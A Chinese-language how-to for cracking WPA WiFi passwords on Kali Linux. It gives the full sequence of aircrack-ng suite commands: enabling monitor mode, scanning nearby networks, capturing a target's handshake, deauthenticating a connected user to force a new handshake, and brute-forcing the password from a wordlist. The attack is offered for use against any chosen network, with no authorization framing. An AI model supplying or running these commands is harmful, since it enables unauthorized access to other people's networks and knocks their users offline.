kali下wifi破解密码教程

首先电脑插入USB无线网卡

wuxianwangka.jpg

然后通过VMware里面 虚拟机 > 可移动设备 选择我们的无线网卡连接，如下图：

0.png

step1: 查看网卡有没有加载进来

root@kali:~# iwconfig 

注：iwconfig是查看无线网卡，ifconfig 是查看有线网卡

1.png

step2： 开启无线网卡的侦听功能

root@kali:~# airmon-ng start wlan0

2.png

此时需要再次查看下网卡：

图片.png

step3：侦听附近的wifi信号

root@kali:~# airodump-ng wlan0mon

33.png

3.png

如果出现无法侦听数据，重启一下服务,命令如下：

root@kali:~# airmon-ng check kill

step4: 选择你要破解的无线网络（ssid）,抓取握手包

root@kali:~# airodump -c 1 --bssid B0:E1:7E:7D:EA:CC  -w secevery wlan0mon

4-1.png

4-2.png

此时如果有人连接这个wifi,就会产生握手包，我们就会抓到这个握手包，但是运气并不是那么好，如上图所示一直没有抓到握手包，因此我们就要手动的踢掉一个人的wifi，这样它就会再次自动连接wifi，产生一个握手吧，这样我们就抓到了握手包。具体来看下一步:

step5：抓不到握手报文，需要模拟station，进行攻击

# aireplay-ng -0 10 -a bssid -c station mac wlan0mon
# aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon

root@kali:~# aireplay-ng -0 10 -a B0:E1:7E:7D:EA:CC -c B0:E1:7E:7D:EA:CC wlan0mon

5.png

此时我们再去看刚才侦听握手包的窗口，发现已经抓到了握手包，如下图所示

55.png

然后查看一下当前目录下抓到的握手包secevery-01.cap

555.png

step6:破解报文，获得密码。 使用字典passwd.txt

root@kali:~# aircrack-ng -a2 -b B0:E1:7E:7D:EA:CC -w passwd.txt secevery-01.cap

6.png